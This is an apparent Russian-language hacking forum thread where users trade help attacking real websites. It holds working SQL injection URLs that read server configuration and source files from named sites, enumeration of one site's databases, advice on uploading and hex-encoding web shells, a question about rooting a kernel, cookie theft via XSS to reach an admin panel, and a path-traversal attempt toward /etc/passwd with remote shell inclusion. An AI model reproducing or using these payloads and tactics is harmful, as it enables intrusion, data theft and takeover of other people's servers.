Ваши вопросы по уязвимостям.

Есть логин и пароль и именя баз данных но немогу найти phpMyAdmin!!! Подскажите хорошую прогу для удаленного редактирования...

 

GOGA075 http://scan.xaknet.ru:8080/action/scan

и не факт что есть phpmyadmin

 

2papst ищи в конфигах пути /etc/httpd/conf/httpd.conf например

 

правильный или нет путь проверяется путем попытки прочитать какую-то страницу сайта:

Code:

http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,load_file('/home/sites/mindviz/httpd/gift.php'),8,9,10,11,12,13,14,15,16,17--+

Путь взят отсюда:

Code:

http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,load_file('/usr/local/apache/conf/httpd.conf'),8,9,10,11,12,13,14,15,16,17--+

DocumentRoot /home/sites/mindviz/httpd <------

Чтобы залить шелл, надо найти папку, доступную на запись, php-код лучше хексить, а не писать в чистом виде

 

есть шанс порутить ядро Fri Dec 4 08:40:11 EET 2009 ?!
этот сплоент был до обновы ядра выпущен

 

http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку

PHP:

Ошибка запроса: 'select name,parentid from kn_tree where id=1 union all select 1'

а если запрос изменить на:
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1,2
то ошибка уже

PHP:

 Ошибка запроса: 'select typeid from kn_tree where id=1 union all select 1,2'

что это значит? и как подобрать количество полей.?
кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая...

 

Подскажите хороший perl интерпретатор для сплоита.

 

click active perl

 

Gorev, благодарю!

 

Version: 5.5.2-m2-log
Database: information_schema / knife / knife_forum / knife_phpbb2
Installation dir: /usr/local/
User: knife@localhost
слепая
з.ы щяс порыскаю может ище чтото найду

 

Как определить какая СУБД?
вылазит такая ошибка
Вывода добиться не получилось
select top 1 * from dbnlcPages where url_path_en in ('tenders/','tenders/c0/','tenders/c0/'--+a/') or url_path in ('tenders/','tenders/c0/','tenders/c0/'--+a/') order by url_path_en desc

 

MSSQL вроде

 

Залил шел, а там только белая страница, в чом проблема может быть??

 

Вообщем возник такой вопрос... возможно ли абсолютно точно определить версию joomla 1.5 ?

Code:

  <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />

Это то понятно... а именно какая можно пробить ?

 

no way man !

 

нашёл хсс активную на одном интересном для меня сайте, но возникла проблема с кражей куков..
Приходят все строки в куках но bbpassword=hash не приходит..
в опере смотрю у себя куки, есть bbpassword=hash а смотрю в логах сниффера нет такова.. это какая то защита от кражи куков или я что то не так делаю ? как быть, что с хсс делать ? как в админку попасть)

 

мы не экстрасенсы скинь сайт

 

Сайт где именно не буду говорить ) просто может кто встречался с этим случием и знает что делать.. у меня такое не с одним сайтом вообще встречалось.. как так, в опере есть кук с хешем: bbpassword а сниффер не ловит его.. как быть..

 

что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59

адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит

 

https://forum.antichat.ru/thread98525.html